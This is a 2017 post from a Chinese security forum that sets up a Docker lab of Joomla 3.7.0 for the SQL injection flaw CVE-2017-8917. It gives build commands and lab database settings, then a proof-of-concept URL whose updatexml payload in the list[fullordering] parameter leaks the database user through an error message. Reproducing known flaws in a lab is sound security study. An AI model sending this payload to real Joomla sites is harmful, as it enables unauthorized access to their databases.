HACK80

我们很年轻,但我们有信念、有梦想!

我们坚信只有今天付出了,才有机会看到明天的太阳!
现在!加入我们,给你一个气氛优秀的技术圈子

作者: 宝宝
查看: 1139|回复: 0

more +随机图赏Gallery

2017年中旬WEB渗透系列课程-18上传绕过方法演示2017年中旬WEB渗透系列课程-18上传绕过方法演示
2017年中旬WEB渗透系列课程-17了解上传检测方式2017年中旬WEB渗透系列课程-17了解上传检测方式
2017年中旬WEB渗透系列课程-16解析漏洞演示2017年中旬WEB渗透系列课程-16解析漏洞演示
2017年中旬WEB渗透系列课程-15XSS绕过集合2017年中旬WEB渗透系列课程-15XSS绕过集合
2017年中旬WEB渗透系列课程-14XSS能干什么2017年中旬WEB渗透系列课程-14XSS能干什么
2017年中旬WEB渗透系列课程-13XSS漏洞检测2017年中旬WEB渗透系列课程-13XSS漏洞检测
2017年中旬WEB渗透系列课程-12XSS分析及演示2017年中旬WEB渗透系列课程-12XSS分析及演示
2017年中旬WEB渗透系列课程-11注入的其他姿势2017年中旬WEB渗透系列课程-11注入的其他姿势
2017年中旬WEB渗透系列课程-10基于提交方式注入的分析2017年中旬WEB渗透系列课程-10基于提交方式注入的分析
2017年中旬WEB渗透系列课程-09Mysql注入跨库2017年中旬WEB渗透系列课程-09Mysql注入跨库

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

[复制链接]
宝宝 发表于 2017-5-25 11:48:42 | 显示全部楼层 |阅读模式
查看: 1139|回复: 0
关注微信公众号,了解最新安全资讯。

马上注册,加入HACK80!与我们一起交流。

正式会员需要 登录 才可以下载或查看,没有帐号?立即注册

x
给各位提供个环境玩玩。
测试环境
编译及启动测试环境:
docker-compose builddocker-compose up -d
启动后访问http://your-ip即可看到Joomla的安装界面,当前环境的数据库信息为:
  • 数据库地址:mysql:3306
  • 用户:root
  • 密码:root
  • 数据库名:joomla
填入上述信息,正常安装即可。
POC测试
安装完成后,访问http://your-ip/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1),即可看到报错信息:

正式会员需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|手机版|小黑屋|HACK80 ( 沪ICP备15007512号 )

GMT+8, 2017-8-22 13:14 , Processed in 0.052520 second(s), 27 queries .

Powered by Discuz! X3.2 © 2001-2013 Comsenz Inc.